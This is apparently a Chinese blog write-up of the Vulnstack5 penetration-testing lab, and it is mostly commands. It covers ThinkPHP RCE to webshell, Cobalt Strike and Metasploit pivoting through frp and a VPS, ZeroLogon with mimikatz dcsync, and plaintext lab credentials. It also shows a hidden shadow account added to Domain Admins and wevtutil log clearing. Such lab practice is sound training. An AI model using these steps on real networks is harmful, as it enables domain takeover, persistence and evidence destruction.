红日靶场五(vulnstack5)渗透分析

环境搭建

复制代码
win7
192.168.111.132(仅主机)
192.168.123.212(桥接)
.\heart p-0p-0p-0

win2008 ip:
192.168.111.131(仅主机)
sun\admin 2020.com

kali ip:
192.168.10.131(nat)

vps:
101.42.**.**

用本地管理员heart登录并开启phpstudy

这里配置的原因是让kali可以访问win7,win7访问不了kali,模拟win7外网的环境和kali内网的环境

getshell

复制代码
sudo nmap -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 512 --host-timeout 30 -T3 -v -oG result.txt --script http-methods --script-args http.useragent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0"  10.133.10.135 -p 0-65535

Discovered open port 110/tcp on 10.133.10.135

Discovered open port 139/tcp on 10.133.10.135

Discovered open port 3306/tcp on 10.133.10.135

Discovered open port 135/tcp on 10.133.10.135

Discovered open port 80/tcp on 10.133.10.135

Discovered open port 445/tcp on 10.133.10.135

Discovered open port 25/tcp on 10.133.10.135

Discovered open port 49152/tcp on 10.133.10.135

Discovered open port 49153/tcp on 10.133.10.135

Discovered open port 49154/tcp on 10.133.10.135

访问80页面发现一个thinkphp框架的首页,工具扫描RCE

复制代码
一键getshell
http://10.133.10.135/peiqi.php   Pass:peiqi

后渗透

将kali通过frp到vps端口,并生成免杀exe,蚁剑上传执行

复制代码
python 签名.py -i D:\Huorong\Sysdiag\bin\HipsMain.exe -t UUIDtoShell.exe -o qm.exe

上线cs,发现为heart用户,管理员权限,svc提权到system,抓取hash和明文,没有发现有用的域用户信息

复制代码
net view
ipconfig /all

发现主机dc:192.168.111.131 ,以及内网网卡192.168.111.132

开启socks代理,通过fscan扫描内网111网段

复制代码
proxychains4  ./fscan -h 192.168.111.0/24

192.168.111.131 MS17-010

192.168.111.131:445 open

192.168.111.131:135 open

192.168.111.131:139 open

192.168.111.131:88 open

存在永恒之蓝,将cs转到msf

复制代码
新建cs监听器,spawn msf/新建会话
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 127.0.0.1
set lport 4566
run

修改frp端口,增加4566为监听端口

复制代码
[cs->msf]
type = tcp
local_ip = 127.0.0.1
local_port = 4566
remote_port = 4566

上线msf,开代理

复制代码
setg Proxies socks5:127.0.0.1:8899
setg ReverseAllowProxy true

MS17-010

复制代码
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.111.131
run

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.111.131
run

失败了

CVE-2020-1472-ZeroLogon

复制代码
mimikatz lsadump::zerologon /target:dc.sun.com /account:dc$
mimikatz lsadump::zerologon /target:dc.sun.com /account:dc$ /exploit
mimikatz lsadump::dcsync /domain:sun.com /dc:dc.sun.com /user:administrator /authuser:dc$ /authdomain:sun.com /authpassword:"" /authntlm
mimikatz lsadump::postzerologon /target:sun.com /account:dc$
#恢复密码,没有权限,可以先打到域控再复原

sun.com\Administrator 9099d68602a60f007c227c4fa95fada6
md5解密:p-0p-0p-0

这里dc不出网,fscan扫描到开启了445端口,直接smb上线

权限维持

复制代码
创建影子账户
net user coleak$ p-0p-0p-0 /add
net localgroup administrators coleak$ /add
net group "Domain Admins" coleak$ /add /domain
net users

痕迹清理

复制代码
wevtutil cl security	//清理安全日志
wevtutil cl system		//清理系统日志
wevtutil cl application		//清理应用程序日志
wevtutil cl "windows powershell"	//清除power shell日志
wevtutil cl Setup	
相关推荐
澪-sl4 分钟前
基于CNN的人脸关键点检测
人工智能·深度学习·神经网络·计算机视觉·cnn·视觉检测·卷积神经网络
爱分享的程序员18 分钟前
前端面试专栏-算法篇:18. 查找算法(二分查找、哈希查找)
前端·javascript·node.js
羊小猪~~20 分钟前
数据库学习笔记(十七)--触发器的使用
数据库·人工智能·后端·sql·深度学习·mysql·考研
翻滚吧键盘23 分钟前
vue 条件渲染(v-if v-else-if v-else v-show)
前端·javascript·vue.js
vim怎么退出24 分钟前
万字长文带你了解微前端架构
前端·微服务·前端框架
你这个年龄怎么睡得着的25 分钟前
为什么 JavaScript 中 'str' 不是对象,却能调用方法?
前端·javascript·面试
Java水解27 分钟前
前端常用单位em/px/rem/vh/vm到底有什么区别?
前端
CAD老兵30 分钟前
Vite 如何借助 esbuild 实现极速 Dev Server 体验,并支持无 source map 的源码调试
前端
南屿im31 分钟前
JavaScript 手写实现防抖与节流:优化高频事件处理的利器
前端·javascript
Spider_Man31 分钟前
从零开始构建React天气应用:API集成与UI设计全指南 🌤️
前端·react.js